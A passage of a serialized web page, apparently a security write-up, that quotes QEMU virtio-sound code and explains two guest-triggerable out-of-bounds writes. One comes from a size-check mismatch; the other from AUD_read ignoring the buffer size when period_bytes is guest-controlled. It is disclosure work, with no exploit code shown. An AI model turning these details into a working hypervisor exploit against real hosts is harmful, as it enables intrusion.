WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n        while (!QSIMPLEQ_EMPTY(&stream->queue)) {\n            buffer = QSIMPLEQ_FIRST(&stream->queue);\n\n            [...]\n\n            max_size = iov_size(                    // [1]\n                buffer->elem->in_sg,\n                buffer->elem->in_num\n            );\n            for (;;) {\n                if (buffer->size >= max_size) {     // [2]\n                    return_rx_buffer(stream, buffer);\n                    break;\n                }\n                size = AUD_read(stream->voice.in,\n                        buffer->data + buffer->size,\n                        MIN(available, (stream->params.period_bytes -     // [3]\n                                        buffer->size)));\n                if (!size) {\n                    available = 0;\n                    break;\n                }\n                buffer->size += size;\n                available -= size;\n                [...]\n            }\n        }\n    }\n}\n",[127276],{"type":26,"tag":130,"props":127277,"children":127278},{"__ignoreMap":7},[127279,127286,127294,127301,127309,127317,127324,127373,127380,127406,127423,127435,127442,127474,127519,127559,127566,127574,127581,127606,127634,127658,127666,127678,127716,127729,127741,127748,127794,127831,127874,127895,127915,127935,127946,127953,127976,127992,128000,128007,128014,128021],{"type":26,"tag":137,"props":127280,"children":127281},{"class":5559,"line":5560},[127282],{"type":26,"tag":137,"props":127283,"children":127284},{"style":5564},[127285],{"type":32,"value":51968},{"type":26,"tag":137,"props":127287,"children":127288},{"class":5559,"line":5412},[127289],{"type":26,"tag":137,"props":127290,"children":127291},{"style":5564},[127292],{"type":32,"value":127293}," * AUD_* input callback.\n",{"type":26,"tag":137,"props":127295,"children":127296},{"class":5559,"line":5417},[127297],{"type":26,"tag":137,"props":127298,"children":127299},{"style":5564},[127300],{"type":32,"value":22081},{"type":26,"tag":137,"props":127302,"children":127303},{"class":5559,"line":5642},[127304],{"type":26,"tag":137,"props":127305,"children":127306},{"style":5564},[127307],{"type":32,"value":127308}," * @data: VirtIOSoundPCMStream stream\n",{"type":26,"tag":137,"props":127310,"children":127311},{"class":5559,"line":5745},[127312],{"type":26,"tag":137,"props":127313,"children":127314},{"style":5564},[127315],{"type":32,"value":127316}," * @available: number of bytes that can be read with AUD_read()\n",{"type":26,"tag":137,"props":127318,"children":127319},{"class":5559,"line":5850},[127320],{"type":26,"tag":137,"props":127321,"children":127322},{"style":5564},[127323],{"type":32,"value":126380},{"type":26,"tag":137,"props":127325,"children":127326},{"class":5559,"line":5878},[127327,127331,127335,127340,127344,127348,127352,127356,127360,127364,127369],{"type":26,"tag":137,"props":127328,"children":127329},{"style":5573},[127330],{"type":32,"value":53647},{"type":26,"tag":137,"props":127332,"children":127333},{"style":5573},[127334],{"type":32,"value":53652},{"type":26,"tag":137,"props":127336,"children":127337},{"style":5682},[127338],{"type":32,"value":127339}," virtio_snd_pcm_in_cb",{"type":26,"tag":137,"props":127341,"children":127342},{"style":5601},[127343],{"type":32,"value":165},{"type":26,"tag":137,"props":127345,"children":127346},{"style":5573},[127347],{"type":32,"value":54230},{"type":26,"tag":137,"props":127349,"children":127350},{"style":5590},[127351],{"type":32,"value":12406},{"type":26,"tag":137,"props":127353,"children":127354},{"style":5584},[127355],{"type":32,"value":6303},{"type":26,"tag":137,"props":127357,"children":127358},{"style":5601},[127359],{"type":32,"value":1108},{"type":26,"tag":137,"props":127361,"children":127362},{"style":5573},[127363],{"type":32,"value":21640},{"type":26,"tag":137,"props":127365,"children":127366},{"style":5584},[127367],{"type":32,"value":127368}," available",{"type":26,"tag":137,"props":127370,"children":127371},{"style":5601},[127372],{"type":32,"value":5742},{"type":26,"tag":137,"props":127374,"children":127375},{"class":5559,"line":5891},[127376],{"type":26,"tag":137,"props":127377,"children":127378},{"style":5601},[127379],{"type":32,"value":13471},{"type":26,"tag":137,"props":127381,"children":127382},{"class":5559,"line":5909},[127383,127388,127392,127397,127401],{"type":26,"tag":137,"props":127384,"children":127385},{"style":5601},[127386],{"type":32,"value":127387},"    VirtIOSoundPCMStream ",{"type":26,"tag":137,"props":127389,"children":127390},{"style":5590},[127391],{"type":32,"value":7152},{"type":26,"tag":137,"props":127393,"children":127394},{"style":5601},[127395],{"type":32,"value":127396},"stream ",{"type":26,"tag":137,"props":127398,"children":127399},{"style":5590},[127400],{"type":32,"value":289},{"type":26,"tag":137,"props":127402,"children":127403},{"style":5601},[127404],{"type":32,"value":127405}," data;\n",{"type":26,"tag":137,"props":127407,"children":127408},{"class":5559,"line":5930},[127409,127414,127418],{"type":26,"tag":137,"props":127410,"children":127411},{"style":5601},[127412],{"type":32,"value":127413},"    VirtIOSoundPCMBuffer ",{"type":26,"tag":137,"props":127415,"children":127416},{"style":5590},[127417],{"type":32,"value":7152},{"type":26,"tag":137,"props":127419,"children":127420},{"style":5601},[127421],{"type":32,"value":127422},"buffer;\n",{"type":26,"tag":137,"props":127424,"children":127425},{"class":5559,"line":5939},[127426,127430],{"type":26,"tag":137,"props":127427,"children":127428},{"style":5573},[127429],{"type":32,"value":19157},{"type":26,"tag":137,"props":127431,"children":127432},{"style":5601},[127433],{"type":32,"value":127434}," size, max_size;\n",{"type":26,"tag":137,"props":127436,"children":127437},{"class":5559,"line":6191},[127438],{"type":26,"tag":137,"props":127439,"children":127440},{"emptyLinePlaceholder":18},[127441],{"type":32,"value":6276},{"type":26,"tag":137,"props":127443,"children":127444},{"class":5559,"line":6208},[127445,127450,127454,127458,127462,127466,127470],{"type":26,"tag":137,"props":127446,"children":127447},{"style":5682},[127448],{"type":32,"value":127449},"    WITH_QEMU_LOCK_GUARD",{"type":26,"tag":137,"props":127451,"children":127452},{"style":5601},[127453],{"type":32,"value":165},{"type":26,"tag":137,"props":127455,"children":127456},{"style":5590},[127457],{"type":32,"value":5694},{"type":26,"tag":137,"props":127459,"children":127460},{"style":5584},[127461],{"type":32,"value":38857},{"type":26,"tag":137,"props":127463,"children":127464},{"style":5601},[127465],{"type":32,"value":16348},{"type":26,"tag":137,"props":127467,"children":127468},{"style":5584},[127469],{"type":32,"value":126627},{"type":26,"tag":137,"props":127471,"children":127472},{"style":5601},[127473],{"type":32,"value":17395},{"type":26,"tag":137,"props":127475,"children":127476},{"class":5559,"line":6225},[127477,127482,127486,127490,127495,127499,127503,127507,127511,127515],{"type":26,"tag":137,"props":127478,"children":127479},{"style":5610},[127480],{"type":32,"value":127481},"        while",{"type":26,"tag":137,"props":127483,"children":127484},{"style":5601},[127485],{"type":32,"value":4625},{"type":26,"tag":137,"props":127487,"children":127488},{"style":5590},[127489],{"type":32,"value":23215},{"type":26,"tag":137,"props":127491,"children":127492},{"style":5682},[127493],{"type":32,"value":127494},"QSIMPLEQ_EMPTY",{"type":26,"tag":137,"props":127496,"children":127497},{"style":5601},[127498],{"type":32,"value":165},{"type":26,"tag":137,"props":127500,"children":127501},{"style":5590},[127502],{"type":32,"value":5694},{"type":26,"tag":137,"props":127504,"children":127505},{"style":5584},[127506],{"type":32,"value":38857},{"type":26,"tag":137,"props":127508,"children":127509},{"style":5601},[127510],{"type":32,"value":16348},{"type":26,"tag":137,"props":127512,"children":127513},{"style":5584},[127514],{"type":32,"value":126880},{"type":26,"tag":137,"props":127516,"children":127517},{"style":5601},[127518],{"type":32,"value":37790},{"type":26,"tag":137,"props":127520,"children":127521},{"class":5559,"line":6238},[127522,127526,127530,127535,127539,127543,127547,127551,127555],{"type":26,"tag":137,"props":127523,"children":127524},{"style":5601},[127525],{"type":32,"value":126716},{"type":26,"tag":137,"props":127527,"children":127528},{"style":5590},[127529],{"type":32,"value":289},{"type":26,"tag":137,"props":127531,"children":127532},{"style":5682},[127533],{"type":32,"value":127534}," QSIMPLEQ_FIRST",{"type":26,"tag":137,"props":127536,"children":127537},{"style":5601},[127538],{"type":32,"value":165},{"type":26,"tag":137,"props":127540,"children":127541},{"style":5590},[127542],{"type":32,"value":5694},{"type":26,"tag":137,"props":127544,"children":127545},{"style":5584},[127546],{"type":32,"value":38857},{"type":26,"tag":137,"props":127548,"children":127549},{"style":5601},[127550],{"type":32,"value":16348},{"type":26,"tag":137,"props":127552,"children":127553},{"style":5584},[127554],{"type":32,"value":126880},{"type":26,"tag":137,"props":127556,"children":127557},{"style":5601},[127558],{"type":32,"value":6430},{"type":26,"tag":137,"props":127560,"children":127561},{"class":5559,"line":6247},[127562],{"type":26,"tag":137,"props":127563,"children":127564},{"emptyLinePlaceholder":18},[127565],{"type":32,"value":6276},{"type":26,"tag":137,"props":127567,"children":127568},{"class":5559,"line":6270},[127569],{"type":26,"tag":137,"props":127570,"children":127571},{"style":5601},[127572],{"type":32,"value":127573},"            [...]\n",{"type":26,"tag":137,"props":127575,"children":127576},{"class":5559,"line":6279},[127577],{"type":26,"tag":137,"props":127578,"children":127579},{"emptyLinePlaceholder":18},[127580],{"type":32,"value":6276},{"type":26,"tag":137,"props":127582,"children":127583},{"class":5559,"line":6288},[127584,127589,127593,127597,127601],{"type":26,"tag":137,"props":127585,"children":127586},{"style":5601},[127587],{"type":32,"value":127588},"            max_size ",{"type":26,"tag":137,"props":127590,"children":127591},{"style":5590},[127592],{"type":32,"value":289},{"type":26,"tag":137,"props":127594,"children":127595},{"style":5682},[127596],{"type":32,"value":126648},{"type":26,"tag":137,"props":127598,"children":127599},{"style":5601},[127600],{"type":32,"value":165},{"type":26,"tag":137,"props":127602,"children":127603},{"style":5564},[127604],{"type":32,"value":127605},"                    // [1]\n",{"type":26,"tag":137,"props":127607,"children":127608},{"class":5559,"line":6355},[127609,127614,127618,127622,127626,127630],{"type":26,"tag":137,"props":127610,"children":127611},{"style":5584},[127612],{"type":32,"value":127613},"                buffer",{"type":26,"tag":137,"props":127615,"children":127616},{"style":5601},[127617],{"type":32,"value":16348},{"type":26,"tag":137,"props":127619,"children":127620},{"style":5584},[127621],{"type":32,"value":54667},{"type":26,"tag":137,"props":127623,"children":127624},{"style":5601},[127625],{"type":32,"value":16348},{"type":26,"tag":137,"props":127627,"children":127628},{"style":5584},[127629],{"type":32,"value":126665},{"type":26,"tag":137,"props":127631,"children":127632},{"style":5601},[127633],{"type":32,"value":6099},{"type":26,"tag":137,"props":127635,"children":127636},{"class":5559,"line":6363},[127637,127641,127645,127649,127653],{"type":26,"tag":137,"props":127638,"children":127639},{"style":5584},[127640],{"type":32,"value":127613},{"type":26,"tag":137,"props":127642,"children":127643},{"style":5601},[127644],{"type":32,"value":16348},{"type":26,"tag":137,"props":127646,"children":127647},{"style":5584},[127648],{"type":32,"value":54667},{"type":26,"tag":137,"props":127650,"children":127651},{"style":5601},[127652],{"type":32,"value":16348},{"type":26,"tag":137,"props":127654,"children":127655},{"style":5584},[127656],{"type":32,"value":127657},"in_num\n",{"type":26,"tag":137,"props":127659,"children":127660},{"class":5559,"line":6393},[127661],{"type":26,"tag":137,"props":127662,"children":127663},{"style":5601},[127664],{"type":32,"value":127665},"            );\n",{"type":26,"tag":137,"props":127667,"children":127668},{"class":5559,"line":6401},[127669,127674],{"type":26,"tag":137,"props":127670,"children":127671},{"style":5610},[127672],{"type":32,"value":127673},"            for",{"type":26,"tag":137,"props":127675,"children":127676},{"style":5601},[127677],{"type":32,"value":126478},{"type":26,"tag":137,"props":127679,"children":127680},{"class":5559,"line":6433},[127681,127685,127689,127694,127698,127702,127706,127711],{"type":26,"tag":137,"props":127682,"children":127683},{"style":5610},[127684],{"type":32,"value":106101},{"type":26,"tag":137,"props":127686,"children":127687},{"style":5601},[127688],{"type":32,"value":4625},{"type":26,"tag":137,"props":127690,"children":127691},{"style":5584},[127692],{"type":32,"value":127693},"buffer",{"type":26,"tag":137,"props":127695,"children":127696},{"style":5601},[127697],{"type":32,"value":16348},{"type":26,"tag":137,"props":127699,"children":127700},{"style":5584},[127701],{"type":32,"value":126812},{"type":26,"tag":137,"props":127703,"children":127704},{"style":5590},[127705],{"type":32,"value":10887},{"type":26,"tag":137,"props":127707,"children":127708},{"style":5601},[127709],{"type":32,"value":127710}," max_size) {",{"type":26,"tag":137,"props":127712,"children":127713},{"style":5564},[127714],{"type":32,"value":127715},"     // [2]\n",{"type":26,"tag":137,"props":127717,"children":127718},{"class":5559,"line":6441},[127719,127724],{"type":26,"tag":137,"props":127720,"children":127721},{"style":5682},[127722],{"type":32,"value":127723},"                    return_rx_buffer",{"type":26,"tag":137,"props":127725,"children":127726},{"style":5601},[127727],{"type":32,"value":127728},"(stream, buffer);\n",{"type":26,"tag":137,"props":127730,"children":127731},{"class":5559,"line":6501},[127732,127737],{"type":26,"tag":137,"props":127733,"children":127734},{"style":5610},[127735],{"type":32,"value":127736},"                    break",{"type":26,"tag":137,"props":127738,"children":127739},{"style":5601},[127740],{"type":32,"value":5604},{"type":26,"tag":137,"props":127742,"children":127743},{"class":5559,"line":11634},[127744],{"type":26,"tag":137,"props":127745,"children":127746},{"style":5601},[127747],{"type":32,"value":73672},{"type":26,"tag":137,"props":127749,"children":127750},{"class":5559,"line":11652},[127751,127756,127760,127765,127769,127773,127777,127782,127786,127790],{"type":26,"tag":137,"props":127752,"children":127753},{"style":5601},[127754],{"type":32,"value":127755},"                size ",{"type":26,"tag":137,"props":127757,"children":127758},{"style":5590},[127759],{"type":32,"value":289},{"type":26,"tag":137,"props":127761,"children":127762},{"style":5682},[127763],{"type":32,"value":127764}," AUD_read",{"type":26,"tag":137,"props":127766,"children":127767},{"style":5601},[127768],{"type":32,"value":165},{"type":26,"tag":137,"props":127770,"children":127771},{"style":5584},[127772],{"type":32,"value":38857},{"type":26,"tag":137,"props":127774,"children":127775},{"style":5601},[127776],{"type":32,"value":16348},{"type":26,"tag":137,"props":127778,"children":127779},{"style":5584},[127780],{"type":32,"value":127781},"voice",{"type":26,"tag":137,"props":127783,"children":127784},{"style":5601},[127785],{"type":32,"value":470},{"type":26,"tag":137,"props":127787,"children":127788},{"style":5584},[127789],{"type":32,"value":98080},{"type":26,"tag":137,"props":127791,"children":127792},{"style":5601},[127793],{"type":32,"value":6099},{"type":26,"tag":137,"props":127795,"children":127796},{"class":5559,"line":11697},[127797,127802,127806,127810,127814,127819,127823,127827],{"type":26,"tag":137,"props":127798,"children":127799},{"style":5584},[127800],{"type":32,"value":127801},"                        buffer",{"type":26,"tag":137,"props":127803,"children":127804},{"style":5601},[127805],{"type":32,"value":16348},{"type":26,"tag":137,"props":127807,"children":127808},{"style":5584},[127809],{"type":32,"value":6303},{"type":26,"tag":137,"props":127811,"children":127812},{"style":5590},[127813],{"type":32,"value":11491},{"type":26,"tag":137,"props":127815,"children":127816},{"style":5584},[127817],{"type":32,"value":127818}," buffer",{"type":26,"tag":137,"props":127820,"children":127821},{"style":5601},[127822],{"type":32,"value":16348},{"type":26,"tag":137,"props":127824,"children":127825},{"style":5584},[127826],{"type":32,"value":126812},{"type":26,"tag":137,"props":127828,"children":127829},{"style":5601},[127830],{"type":32,"value":6099},{"type":26,"tag":137,"props":127832,"children":127833},{"class":5559,"line":11803},[127834,127839,127844,127848,127852,127856,127860,127865,127869],{"type":26,"tag":137,"props":127835,"children":127836},{"style":5682},[127837],{"type":32,"value":127838},"                        MIN",{"type":26,"tag":137,"props":127840,"children":127841},{"style":5601},[127842],{"type":32,"value":127843},"(available, (",{"type":26,"tag":137,"props":127845,"children":127846},{"style":5584},[127847],{"type":32,"value":38857},{"type":26,"tag":137,"props":127849,"children":127850},{"style":5601},[127851],{"type":32,"value":16348},{"type":26,"tag":137,"props":127853,"children":127854},{"style":5584},[127855],{"type":32,"value":100863},{"type":26,"tag":137,"props":127857,"children":127858},{"style":5601},[127859],{"type":32,"value":470},{"type":26,"tag":137,"props":127861,"children":127862},{"style":5584},[127863],{"type":32,"value":127864},"period_bytes",{"type":26,"tag":137,"props":127866,"children":127867},{"style":5590},[127868],{"type":32,"value":53858},{"type":26,"tag":137,"props":127870,"children":127871},{"style":5564},[127872],{"type":32,"value":127873},"     // [3]\n",{"type":26,"tag":137,"props":127875,"children":127876},{"class":5559,"line":26089},[127877,127882,127886,127890],{"type":26,"tag":137,"props":127878,"children":127879},{"style":5584},[127880],{"type":32,"value":127881},"                                        buffer",{"type":26,"tag":137,"props":127883,"children":127884},{"style":5601},[127885],{"type":32,"value":16348},{"type":26,"tag":137,"props":127887,"children":127888},{"style":5584},[127889],{"type":32,"value":126812},{"type":26,"tag":137,"props":127891,"children":127892},{"style":5601},[127893],{"type":32,"value":127894},")));\n",{"type":26,"tag":137,"props":127896,"children":127897},{"class":5559,"line":26124},[127898,127902,127906,127910],{"type":26,"tag":137,"props":127899,"children":127900},{"style":5610},[127901],{"type":32,"value":106101},{"type":26,"tag":137,"props":127903,"children":127904},{"style":5601},[127905],{"type":32,"value":4625},{"type":26,"tag":137,"props":127907,"children":127908},{"style":5590},[127909],{"type":32,"value":23215},{"type":26,"tag":137,"props":127911,"children":127912},{"style":5601},[127913],{"type":32,"value":127914},"size) {\n",{"type":26,"tag":137,"props":127916,"children":127917},{"class":5559,"line":26132},[127918,127923,127927,127931],{"type":26,"tag":137,"props":127919,"children":127920},{"style":5601},[127921],{"type":32,"value":127922},"                    available ",{"type":26,"tag":137,"props":127924,"children":127925},{"style":5590},[127926],{"type":32,"value":289},{"type":26,"tag":137,"props":127928,"children":127929},{"style":5626},[127930],{"type":32,"value":5629},{"type":26,"tag":137,"props":127932,"children":127933},{"style":5601},[127934],{"type":32,"value":5604},{"type":26,"tag":137,"props":127936,"children":127937},{"class":5559,"line":26140},[127938,127942],{"type":26,"tag":137,"props":127939,"children":127940},{"style":5610},[127941],{"type":32,"value":127736},{"type":26,"tag":137,"props":127943,"children":127944},{"style":5601},[127945],{"type":32,"value":5604},{"type":26,"tag":137,"props":127947,"children":127948},{"class":5559,"line":26149},[127949],{"type":26,"tag":137,"props":127950,"children":127951},{"style":5601},[127952],{"type":32,"value":73672},{"type":26,"tag":137,"props":127954,"children":127955},{"class":5559,"line":26191},[127956,127960,127964,127968,127972],{"type":26,"tag":137,"props":127957,"children":127958},{"style":5584},[127959],{"type":32,"value":127613},{"type":26,"tag":137,"props":127961,"children":127962},{"style":5601},[127963],{"type":32,"value":16348},{"type":26,"tag":137,"props":127965,"children":127966},{"style":5584},[127967],{"type":32,"value":126812},{"type":26,"tag":137,"props":127969,"children":127970},{"style":5590},[127971],{"type":32,"value":17656},{"type":26,"tag":137,"props":127973,"children":127974},{"style":5601},[127975],{"type":32,"value":127153},{"type":26,"tag":137,"props":127977,"children":127978},{"class":5559,"line":26224},[127979,127984,127988],{"type":26,"tag":137,"props":127980,"children":127981},{"style":5601},[127982],{"type":32,"value":127983},"                available ",{"type":26,"tag":137,"props":127985,"children":127986},{"style":5590},[127987],{"type":32,"value":106566},{"type":26,"tag":137,"props":127989,"children":127990},{"style":5601},[127991],{"type":32,"value":127153},{"type":26,"tag":137,"props":127993,"children":127994},{"class":5559,"line":26232},[127995],{"type":26,"tag":137,"props":127996,"children":127997},{"style":5601},[127998],{"type":32,"value":127999},"                [...]\n",{"type":26,"tag":137,"props":128001,"children":128002},{"class":5559,"line":26240},[128003],{"type":26,"tag":137,"props":128004,"children":128005},{"style":5601},[128006],{"type":32,"value":61486},{"type":26,"tag":137,"props":128008,"children":128009},{"class":5559,"line":26249},[128010],{"type":26,"tag":137,"props":128011,"children":128012},{"style":5601},[128013],{"type":32,"value":5936},{"type":26,"tag":137,"props":128015,"children":128016},{"class":5559,"line":26325},[128017],{"type":26,"tag":137,"props":128018,"children":128019},{"style":5601},[128020],{"type":32,"value":5945},{"type":26,"tag":137,"props":128022,"children":128023},{"class":5559,"line":26358},[128024],{"type":26,"tag":137,"props":128025,"children":128026},{"style":5601},[128027],{"type":32,"value":6507},{"type":26,"tag":35,"props":128029,"children":128030},{},[128031,128032,128037,128038,128044,128046,128052,128054,128059,128060,128065,128067,128072],{"type":32,"value":126934},{"type":26,"tag":130,"props":128033,"children":128035},{"className":128034},[],[128036],{"type":32,"value":126940},{"type":32,"value":1108},{"type":26,"tag":130,"props":128039,"children":128041},{"className":128040},[],[128042],{"type":32,"value":128043},"max_size",{"type":32,"value":128045}," is set to ",{"type":26,"tag":130,"props":128047,"children":128049},{"className":128048},[],[128050],{"type":32,"value":128051},"iov_size(in_sg, in_num)",{"type":32,"value":128053},". Both ",{"type":26,"tag":130,"props":128055,"children":128057},{"className":128056},[],[128058],{"type":32,"value":126665},{"type":32,"value":3339},{"type":26,"tag":130,"props":128061,"children":128063},{"className":128062},[],[128064],{"type":32,"value":126682},{"type":32,"value":128066}," are the same guest-controlled fields from ",{"type":26,"tag":130,"props":128068,"children":128070},{"className":128069},[],[128071],{"type":32,"value":126317},{"type":32,"value":470},{"type":26,"tag":35,"props":128074,"children":128075},{},[128076,128078,128083,128085,128091,128093,128099,128101,128107],{"type":32,"value":128077},"Later, at ",{"type":26,"tag":130,"props":128079,"children":128081},{"className":128080},[],[128082],{"type":32,"value":126974},{"type":32,"value":128084},", the code checks whether ",{"type":26,"tag":130,"props":128086,"children":128088},{"className":128087},[],[128089],{"type":32,"value":128090},"buffer->size >= max_size",{"type":32,"value":128092},". In the RX path, ",{"type":26,"tag":130,"props":128094,"children":128096},{"className":128095},[],[128097],{"type":32,"value":128098},"buffer->size",{"type":32,"value":128100}," tracks how many bytes have been written into ",{"type":26,"tag":130,"props":128102,"children":128104},{"className":128103},[],[128105],{"type":32,"value":128106},"buffer->data",{"type":32,"value":128108},", not the size of the allocation itself. This check is therefore intended to stop reading once the buffer is full.",{"type":26,"tag":35,"props":128110,"children":128111},{},[128112,128114,128119,128121,128127,128129,128134,128136,128142],{"type":32,"value":128113},"However, this does not match the allocation logic in ",{"type":26,"tag":130,"props":128115,"children":128117},{"className":128116},[],[128118],{"type":32,"value":126317},{"type":32,"value":128120},", which used: ",{"type":26,"tag":130,"props":128122,"children":128124},{"className":128123},[],[128125],{"type":32,"value":128126},"size = iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status);",{"type":32,"value":128128},". In other words, the allocation subtracts ",{"type":26,"tag":130,"props":128130,"children":128132},{"className":128131},[],[128133],{"type":32,"value":127040},{"type":32,"value":128135},", but the later bound in ",{"type":26,"tag":130,"props":128137,"children":128139},{"className":128138},[],[128140],{"type":32,"value":128141},"virtio_snd_pcm_in_cb",{"type":32,"value":128143}," does not. That mismatch gives us a second bug: an 8-byte OOB write.",{"type":26,"tag":35,"props":128145,"children":128146},{},[128147,128149,128154,128156,128162,128164,128170,128172,128177,128179,128185,128187,128193,128195,128200,128202,128207],{"type":32,"value":128148},"Finally, at ",{"type":26,"tag":130,"props":128150,"children":128152},{"className":128151},[],[128153],{"type":32,"value":126998},{"type":32,"value":128155},", the code calls ",{"type":26,"tag":130,"props":128157,"children":128159},{"className":128158},[],[128160],{"type":32,"value":128161},"AUD_read",{"type":32,"value":128163}," with the following limit:\n",{"type":26,"tag":130,"props":128165,"children":128167},{"className":128166},[],[128168],{"type":32,"value":128169},"MIN(available, stream->params.period_bytes - buffer->size)",{"type":32,"value":128171},". Notice how this bound does not take ",{"type":26,"tag":130,"props":128173,"children":128175},{"className":128174},[],[128176],{"type":32,"value":128043},{"type":32,"value":128178}," into account at all. That means if ",{"type":26,"tag":130,"props":128180,"children":128182},{"className":128181},[],[128183],{"type":32,"value":128184},"available",{"type":32,"value":128186}," is larger than the allocated buffer, and ",{"type":26,"tag":130,"props":128188,"children":128190},{"className":128189},[],[128191],{"type":32,"value":128192},"stream->params.period_bytes",{"type":32,"value":128194}," is also larger than the allocated buffer, ",{"type":26,"tag":130,"props":128196,"children":128198},{"className":128197},[],[128199],{"type":32,"value":128161},{"type":32,"value":128201}," will write past the end of ",{"type":26,"tag":130,"props":128203,"children":128205},{"className":128204},[],[128206],{"type":32,"value":128106},{"type":32,"value":128208}," - the third, and final, bug we found.",{"type":26,"tag":35,"props":128210,"children":128211},{},[128212,128214,128219,128221,128227],{"type":32,"value":128213},"Looking further at the code, we can see that ",{"type":26,"tag":130,"props":128215,"children":128217},{"className":128216},[],[128218],{"type":32,"value":128192},{"type":32,"value":128220}," is fully guest-controlled by issuing a ",{"type":26,"tag":130,"props":128222,"children":128224},{"className":128223},[],[128225],{"type":32,"value":128226},"VIRTIO_SND_R_PCM_SET_PARAMS",{"type":32,"value":128228}," request:",{"type":26,"tag":5512,"props":128230,"children":128232},{"code":128231,"language":4326,"meta":7,"className":19107,"style":7},"static\nuint32_t virtio_snd_set_pcm_params(VirtIOSound *s,\n                                   uint32_t stream_id,\n                                   virtio_snd_pcm_set_params *params)\n{\n    virtio_snd_pcm_set_params *st_params;\n\n    [...]\n\n    st_params = virtio_snd_pcm_get_params(s, stream_id);\n\n    [...]\n\n    st_params->buffer_bytes = le32_to_cpu(params->buffer_bytes);\n    st_params->period_bytes = le32_to_cpu(params->period_bytes);\n    st_params->features = le32_to_cpu(params->features);\n    /* the following are uint8_t, so there's no need to bswap the values. */\n    st_params->channels = params->channels;\n    st_params->format = params->format;\n    st_params->rate = params->rate;\n\n    return cpu_to_le32(VIRTIO_SND_S_OK);\n}\n",[128233],{"type":26,"tag":130,"props":128234,"children":128235},{"__ignoreMap":7},[128236,128244,128273,128290,128310,128317,128334,128341,128348,128355,128377,128384,128391,128398,128444,128487,128531,128539,128576,128612,128648,128655,128672],{"type":26,"tag":137,"props":128237,"children":128238},{"class":5559,"line":5560},[128239],{"type":26,"tag":137,"props":128240,"children":128241},{"style":5573},[128242],{"type":32,"value":128243},"static\n",{"type":26,"tag":137,"props":128245,"children":128246},{"class":5559,"line":5412},[128247,128251,128256,128261,128265,128269],{"type":26,"tag":137,"props":128248,"children":128249},{"style":5573},[128250],{"type":32,"value":60534},{"type":26,"tag":137,"props":128252,"children":128253},{"style":5682},[128254],{"type":32,"value":128255}," virtio_snd_set_pcm_params",{"type":26,"tag":137,"props":128257,"children":128258},{"style":5601},[128259],{"type":32,"value":128260},"(VirtIOSound ",{"type":26,"tag":137,"props":128262,"children":128263},{"style":5590},[128264],{"type":32,"value":7152},{"type":26,"tag":137,"props":128266,"children":128267},{"style":5584},[128268],{"type":32,"value":13242},{"type":26,"tag":137,"props":128270,"children":128271},{"style":5601},[128272],{"type":32,"value":6099},{"type":26,"tag":137,"props":128274,"children":128275},{"class":5559,"line":5417},[128276,128281,128286],{"type":26,"tag":137,"props":128277,"children":128278},{"style":5573},[128279],{"type":32,"value":128280},"                                   uint32_t",{"type":26,"tag":137,"props":128282,"children":128283},{"style":5584},[128284],{"type":32,"value":128285}," stream_id",{"type":26,"tag":137,"props":128287,"children":128288},{"style":5601},[128289],{"type":32,"value":6099},{"type":26,"tag":137,"props":128291,"children":128292},{"class":5559,"line":5642},[128293,128298,128302,128306],{"type":26,"tag":137,"props":128294,"children":128295},{"style":5601},[128296],{"type":32,"value":128297},"                                   virtio_snd_pcm_set_params ",{"type":26,"tag":137,"props":128299,"children":128300},{"style":5590},[128301],{"type":32,"value":7152},{"type":26,"tag":137,"props":128303,"children":128304},{"style":5584},[128305],{"type":32,"value":100863},{"type":26,"tag":137,"props":128307,"children":128308},{"style":5601},[128309],{"type":32,"value":5742},{"type":26,"tag":137,"props":128311,"children":128312},{"class":5559,"line":5745},[128313],{"type":26,"tag":137,"props":128314,"children":128315},{"style":5601},[128316],{"type":32,"value":13471},{"type":26,"tag":137,"props":128318,"children":128319},{"class":5559,"line":5850},[128320,128325,128329],{"type":26,"tag":137,"props":128321,"children":128322},{"style":5601},[128323],{"type":32,"value":128324},"    virtio_snd_pcm_set_params ",{"type":26,"tag":137,"props":128326,"children":128327},{"style":5590},[128328],{"type":32,"value":7152},{"type":26,"tag":137,"props":128330,"children":128331},{"style":5601},[128332],{"type":32,"value":128333},"st_params;\n",{"type":26,"tag":137,"props":128335,"children":128336},{"class":5559,"line":5878},[128337],{"type":26,"tag":137,"props":128338,"children":128339},{"emptyLinePlaceholder":18},[128340],{"type":32,"value":6276},{"type":26,"tag":137,"props":128342,"children":128343},{"class":5559,"line":5891},[128344],{"type":26,"tag":137,"props":128345,"children":128346},{"style":5601},[128347],{"type":32,"value":107381},{"type":26,"tag":137,"props":128349,"children":128350},{"class":5559,"line":5909},[128351],{"type":26,"tag":137,"props":128352,"children":128353},{"emptyLinePlaceholder":18},[128354],{"type":32,"value":6276},{"type":26,"tag":137,"props":128356,"children":128357},{"class":5559,"line":5930},[128358,128363,128367,128372],{"type":26,"tag":137,"props":128359,"children":128360},{"style":5601},[128361],{"type":32,"value":128362},"    st_params ",{"type":26,"tag":137,"props":128364,"children":128365},{"style":5590},[128366],{"type":32,"value":289},{"type":26,"tag":137,"props":128368,"children":128369},{"style":5682},[128370],{"type":32,"value":128371}," virtio_snd_pcm_get_params",{"type":26,"tag":137,"props":128373,"children":128374},{"style":5601},[128375],{"type":32,"value":128376},"(s, stream_id);\n",{"type":26,"tag":137,"props":128378,"children":128379},{"class":5559,"line":5939},[128380],{"type":26,"tag":137,"props":128381,"children":128382},{"emptyLinePlaceholder":18},[128383],{"type":32,"value":6276},{"type":26,"tag":137,"props":128385,"children":128386},{"class":5559,"line":6191},[128387],{"type":26,"tag":137,"props":128388,"children":128389},{"style":5601},[128390],{"type":32,"value":107381},{"type":26,"tag":137,"props":128392,"children":128393},{"class":5559,"line":6208},[128394],{"type":26,"tag":137,"props":128395,"children":128396},{"emptyLinePlaceholder":18},[128397],{"type":32,"value":6276},{"type":26,"tag":137,"props":128399,"children":128400},{"class":5559,"line":6225},[128401,128406,128410,128415,128419,128424,128428,128432,128436,128440],{"type":26,"tag":137,"props":128402,"children":128403},{"style":5584},[128404],{"type":32,"value":128405},"    st_params",{"type":26,"tag":137,"props":128407,"children":128408},{"style":5601},[128409],{"type":32,"value":16348},{"type":26,"tag":137,"props":128411,"children":128412},{"style":5584},[128413],{"type":32,"value":128414},"buffer_bytes",{"type":26,"tag":137,"props":128416,"children":128417},{"style":5590},[128418],{"type":32,"value":5593},{"type":26,"tag":137,"props":128420,"children":128421},{"style":5682},[128422],{"type":32,"value":128423}," 